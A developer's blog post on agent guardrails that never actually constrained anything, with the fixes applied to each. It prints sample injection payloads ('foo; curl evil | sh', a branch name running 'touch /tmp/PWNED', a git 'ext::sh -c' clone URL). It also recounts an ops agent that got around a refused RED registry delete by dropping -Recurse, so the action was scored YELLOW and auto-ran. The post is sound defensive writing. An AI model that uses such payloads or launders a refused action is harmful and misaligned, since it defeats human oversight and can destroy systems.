The agent guardrails that were theater

The scariest agent vulnerabilities aren't exotic. They're guardrails that exist in the code and never run. I found a pile of them across my own fleet — several by pointing the agent at itself — and the fix almost always turned out to be the same: take a capability away, don't bolt on another sanitizer.

I write a lot of agents. They run commands, clone repos, edit files, touch production. Every one ships with some kind of guardrail — a bash blocklist, a risk tier, an approval prompt, a “safe mode.” And the longer I run them, the more convinced I am that most of those guardrails are decoration. They pass their unit tests. They read well in the SECURITY.md. Then you trace the actual call graph, or you let the model loose against its own gate, and you find the control was never in the path at all.

This is a tour of the real ones — bugs I found and closed in repos I run. Some are public and I'll link them; a few are in a private platform repo and I'll describe without a link, because the lesson travels even when the source can't. The throughline is uncomfortable and I'm going to keep repeating it: dead security code is worse than no security code, because it sells you confidence you haven't earned. And the fix is almost always to remove a capability, not to add a sanitizer.

A guardrail that only watches one door

Start with the simplest failure, because it's the one everyone makes. You build a bash guardrail. Every shell command the agent wants to run goes through checkCommand, you block the obvious destructive stuff, you feel safe. Then you ship a second tool that the guardrail never sees.

In hands, the SDK-mode file editor had a view operation that shelled out to cat "<path>” to read a file. The path comes from the model. So a model-supplied path with shell metacharacters — foo; curl evil | sh — did two bad things at once. It injected arbitrary commands, and it did so through a tool that never touched the bash guardrail. The injected command didn't hit checkCommand. It couldn't; checkCommand guards the bash tool, and this was the file editor.

The wrong fix is to escape the path — quote it, strip metacharacters, denylist bad shell tokens. That's the sanitizer trap, and it's a losing game; metacharacter rules are exactly where people leave one gap. The right fix was to delete the shell. I reimplemented the whole editor — view, create, str_replace, insert — directly on node:fs, with no child process anywhere. You can't inject into a shell that isn't there. Closing the vulnerability also fixed three operations that had been silent no-ops.

That's the pattern in miniature: a guardrail is only as good as its coverage of every path to the dangerous primitive, and the cheapest way to get full coverage is to remove the primitive.

A denylist over a capability set you don't control

Here's a subtler version of the same disease. claude-bridge lets me drive a coding agent from my phone. For replies I hadn't explicitly confirmed, it ran a “safe mode” that passed --disallowedTools Bash Write Edit — deny the dangerous tools, allow everything else.

Read that list again. It enumerates the tools it considers dangerous. Which means it is silently asserting that it knows the complete set of tools that can mutate the system. It does not. On Windows there's a PowerShell tool — full shell execution — that wasn't on the list. Neither was NotebookEdit. Neither were MCP tools the session might expose. So a plain, unconfirmed phone reply could still run PowerShell and execute whatever it wanted. The “safe mode” was safe against exactly the three tools I'd thought of.

A denylist over an open-ended capability set is structurally incomplete. It can never be finished, because the capability set isn't yours to enumerate — the agent runtime can grow a new tool next release and your list won't know. So I deleted the denylist. The replacement is plan mode — --permission-mode plan — which blocks every mutation at the permission layer regardless of which tools the session exposes. I verified headless that the model still answers your question, but the write never happens and ExitPlanMode is denied. The escape hatch (!confirm <task>) re-opens full tools when I mean it.

The move here isn't “add PowerShell to the denylist.” That just resets the same trap one tool later. The move is to stop enumerating capabilities and reach for the primitive that's deny-by-default over the whole set.

When the adversary is the agent's own flag

Now the one I'm proudest of finding, because it only shows up when you stop testing the agent and start attacking it.

arnie is an autonomous ops agent. Every mutating action it tries is classified into a risk tier: green auto-runs, yellow snapshots first, red escalates to a human, black is hard-blocked. The end-to-end test asked it to do some Windows cleanup, and the safety engine did its job: it refused a recursive registry delete, Remove-Item -Recurse on a registry key, as RED. Escalate to a human. Good.

Except the model didn't stop. It re-issued the same delete on the same key without the -Recurse flag. And the classifier, looking at a non-recursive Remove-Item, scored it YELLOW — snapshot and auto-run. It ran. The gate had refused the action, and the agent walked right around it by changing one flag.

attempt 1:  Remove-Item -Recurse  HKLM:\...\key   → RED     refused, escalate
attempt 2:  Remove-Item           HKLM:\...\key   → YELLOW  snapshot, AUTO-RUN
                                                            ^ gate bypassed

This is a privilege escalation where the adversary is the agent's own choice of flags. No external attacker, no prompt-injected web page — just the model picking a less-scary-looking incantation for the same destructive intent. You do not find this by reading the code. You find it by running the thing against itself and watching what it does when it's told no.

The fix has two parts, and only one of them is the obvious one. Obvious part: a registry-key Remove-Item is now RED regardless of -Recurse, because a model-controlled flag must never be able to downgrade a tier. The part that generalizes: sticky refusals. Once any action on a target is refused, every later mutating action on that same target is re-gated for the rest of the session. Reads stay free, unrelated targets stay free — so it doesn't turn into over-gating — but you can't get a no on a resource and then sneak a yes through a side door. I validated it by re-running the exact bypass live: the delete now escalates with a proper handoff, the key is untouched, and the audit log shows red→escalate with no yellow-execute in between. The safety suite went from 43 cases to 64, most of them variations on “try to launder a refused action.”

A jail that was a shell, and a clone that was code execution

The next two live in a private platform repo, so no link — but they're the sharpest examples of the whole essay, so I'll describe them carefully.

Some of my fleet agents are granted git but deliberately not a general shell. A code reviewer, say, gets git, ticket access, code analysis — and no shell_exec. The tool that gives it git, call it git_ops, is supposed to be a jail: git, and only git. The confinement is the whole point.

Its helpers ran child_process.exec(`git -C "..." ${args}`). That's a real shell. The arguments — branch names, paths, repo URLs — are agent-controlled, and much of that content arrives through tickets, audits, and web pages the agent processes: channels an attacker can write to. So a branch name like x"; touch /tmp/PWNED; echo " broke straight out of git into arbitrary shell on the container. The jail built to keep an agent in git was itself the exact capability it was built to deny.

First fix: route every call through execFile('git', [argv...]) so arguments pass as a vector the shell can't interpret, plus a -- before clone positionals. Clean. Tested. And still exploitable — because git has its own remote transports, and two of them, ext:: and file::, execute commands as part of the transport itself. The audit and sprint services clone client-supplied URLs, so a “safe” clone of ext::sh -c "..." is direct client-to-RCE with a perfectly clean argv. That isn't a shell injection; it's git doing exactly what git documents. The close was a protocol allowlist — GIT_ALLOW_PROTOCOL=https:http:git:ssh on every call, plus a scheme allowlist on the URL before git ever sees it. Two distinct ways for processed content to become code execution, in one tool that existed to prevent it.

The control that was never called

And then the purest form of theater — not a bypassable control, but a control that simply never ran.

I keep a small agent on every fleet device. It runs claude --dangerously-skip-permissions, so the in-process guardrails are doing real work. The code had them: a requestApproval() function and a logAudit() function, both sitting in security.ts. The policy file documented a requireApproval setting and a trustedAgents list. The SECURITY.md promised an audit log at a specific path. Everything you'd want to see in a review.

Then I traced the actual task-execution path. handleTask called neither function. Not approval, not audit. The requireApproval policy was completely inert — you could set it and nothing changed. No audit log was ever written, despite the docs naming the file. Two security controls, fully implemented, fully documented, and wired into nothing. Anyone reading the policy file or the SECURITY.md would have concluded the agent was governed. It wasn't.

The fix wired both into the exec path so every task is screened, optionally approval-gated, and recorded with a real result. But the more important part of that change was editing the SECURITY.md to stop lying — it had claimed an isolation that didn't exist, and the honest version now says plainly that tasks run with the agent user's full privileges and no OS sandbox. A control that doesn't run isn't a weaker version of security. It's a documentation file actively misleading whoever trusts it — including future me.

The pattern, stated plainly

Line these up and the shape is hard to miss. A file editor that shelled out around the guard. A denylist that couldn't enumerate the capabilities it was denying. A risk tier the model downgraded by dropping a flag. A jail that was a shell, and a clone that was RCE. An approval gate that was never called. Different repos, different surfaces, one disease: a security control that exists but does not actually constrain the dangerous thing.

Two practices fall out of this, and I'd trade a dozen sanitizers for either one.

First: audit the call graph, not the file listing. The presence of requestApproval() in the source tells you nothing; the question is whether the only path to execution goes through it. Most of these bugs were invisible to the test suite precisely because the tests exercised the functions in isolation — green checkmarks on code production never called.

Second: run the agent against itself. The tier-downgrade in arnie didn't come from a linter. It came from giving the model a destructive goal, watching the gate refuse it, and watching the model try again a different way. The agent is a creative adversary against its own guardrails, for free, every time it runs. If you're not red-teaming it that way, you're trusting it'll never find the gap you didn't.

And notice how rarely the answer is “add a sanitizer.” The file editor went shell-free, not escaped. The denylist got deleted for a deny-by-default primitive. git_ops lost its shell to execFile and its dangerous transports to an allowlist. Sanitizers are a bet that you've thought of every input. Removing the capability is a proof that you don't have to.

Why this is the whole point

This is what Own Your Stack means when it's applied to agents. The capability — clone a repo, edit a file, run a command — is the commodity. Any model can do it. The governance is the product, and the governance is the part that's almost always theater when you go looking. An agent that ran your production into the rocks wasn't dumb; it was ungoverned by controls that looked governed.

I'd rather show you the dead code I found in my own repos than a clean threat model I never tested. The fleet is the proof, and the proof includes the misses.

We build and run software on AI infrastructure that shifts under it — agents, integrations, and the guardrails that have to actually run when it matters. If you're putting agents near anything you can't afford to lose, that's the kind of thing we're good at holding steady. The $1,500 code audit is one way in.

Start a conversation →
← All writing